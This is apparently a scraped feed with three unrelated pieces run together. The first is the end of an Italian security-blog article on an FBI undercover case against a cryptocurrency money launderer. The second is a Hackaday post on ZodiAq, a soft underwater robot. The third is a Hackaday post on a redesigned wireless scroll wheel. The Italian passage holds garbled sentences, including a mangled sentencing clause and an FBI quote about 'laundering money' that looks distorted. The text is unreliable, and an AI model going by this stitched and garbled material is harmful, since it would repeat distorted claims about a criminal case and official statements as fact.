Dei documenti relativi a questi episodi non erano sempre collegati a ElonmuskWHM, ma i dettagli (numeri di telefono, date e metodi di azione) erano coerenti. Gli inquirenti ritengono che Murarka abbia integrato il suo piano in un antico sistema di trasferimento di denaro noto come hawala o angadia, adattandolo però alla criptovaluta.

In precedenza Murarka aveva diretto un’azienda di geoinformazione e aveva addirittura inviato agli agenti video su YouTube del suo precedente impiego, ignaro del fatto che ogni suo clic veniva tracciato. Gli investigatori hanno confermato la sua identità basandosi sui dati di Google, Uber, Binance e Apple.

Video di YouTube inviati ai clienti. Ogni video è stato visualizzato rispettivamente circa 2.000 e 1.400 volte (404 Media)

Nel gennaio 2025, il tribunale ha condannato Murarku è stato condannato a 121 mesi (10 anni e 1 mese) di reclusione. Gli inquirenti hanno affermato che Murarka ha fondato uno dei più grandi exchange di criptovalute al mondo, incassando più di 24 milioni di dollari in meno di due anni. Il portavoce dell’FBI ha aggiunto che l’agenzia utilizzerà tutti i mezzi necessari per denunciare le reti criminali, anche se ciò significa riciclare denaro.

L'articolo Il Piccolo Ufficio Postale ha Fregato Mezza Internet! L’operazione sotto copertura dell’FBI proviene da il blog della sicurezza informatica.

Underwater robots face many challenges, not least of which is how to move around. ZodiAq is a prototype underwater soft robot (link is to research paper) that takes an unusual approach to this problem: multiple flexible appendages. The result is a pretty unconventional-looking device that can not only get around effectively, but can do so without disturbing marine life.

ZodiAq sports a soft flexible appendage from each of its twelve faces, but they aren’t articulated like you might think. Despite this, the device can crawl and swim.
With movement inspired by bacterial flagella, ZodiAq moves in an unusual but highly controllable way.
Each soft appendage is connected to a motor, which rotates the attached appendage. This low-frequency but high-torque rotation, combined with the fact that each appendage has a 45° bend to it, has each acting as a rotor. Rotation of the appendages acts on the surrounding fluid, generating thrust. When used together in the right way, these appendages allow the unit to move in a perfectly controllable manner.

This locomotion method is directly inspired by the swimming gait of bacterial flagella (which the paper mentions are regarded as the only example of a biological “wheel”.)

How fast can it go? The prototype covers a distance of two body lengths every fifteen seconds. True, it’s no speed demon compared to a propeller, but it doesn’t disturb marine life or environments as it moves around. This method of movement has a lot going for it. It’s adaptable and doesn’t use all twelve appendages at once; so there’s redundancy built in. If some get damaged or go missing, it can still move, just slower.

ZodiAq‘s design strikes us as a very accessible concept, should any aspiring marine robot hackers wish to give it a shot. We’ve seen other highly innovative and beautiful underwater designs as well, like body-length undulating fins and articulated soft arms.

We do notice that since it lacks a “front” — it might be a challenge to decide how to mount something like a camera. If you have any ideas, share them in the comments.

hackaday.com/2025/04/09/forget…

Sitting in front of a computer all day isn’t exactly what the firmware between our ears was tuned to do. We’re supposed to be hunting and gathering, not hunting and pecking. So anything that makes the computing experience a little more pleasurable is probably worth the effort, and this premium wireless scroll wheel certainly seems to fit that bill.

If this input device seems familiar, that’s because we featured [Engineer Bo]’s first take on this back at the end of 2024. That version took a lot of work to get right, and while it delivered high-resolution scrolling with a premium look and feel, [Bo] just wasn’t quite satisfied with the results. There were also a few minor quibbles, such as making the power switch a little more user-friendly and optimizing battery life, but the main problem was the one that we admit would have driven us crazy, too: the wobbling scroll wheel.

[Bo]’s first approach to the wobble problem was to fit a larger diameter bearing under the scroll wheel. That worked, but at the expense of eliminating the satisfying fidget-spinner action of the original — not acceptable. Different bearings yielded the same result until [Bo] hit on the perfect solution: a large-diameter ceramic bearing that eliminated the wobble while delivering the tactile flywheel experience.

The larger bearing left more room inside for the redesigned PCB and a lower-profile, machined aluminum wheel. [Bo] also had a polycarbonate wheel made, which looks great as is but would really be cool with internal LEDs — at the cost of battery life, of course. He’s also got plans for a wheel machined from wood, which we’ll eagerly await.

youtube.com/embed/tzqJ1rJURgs?…

hackaday.com/2025/04/09/better…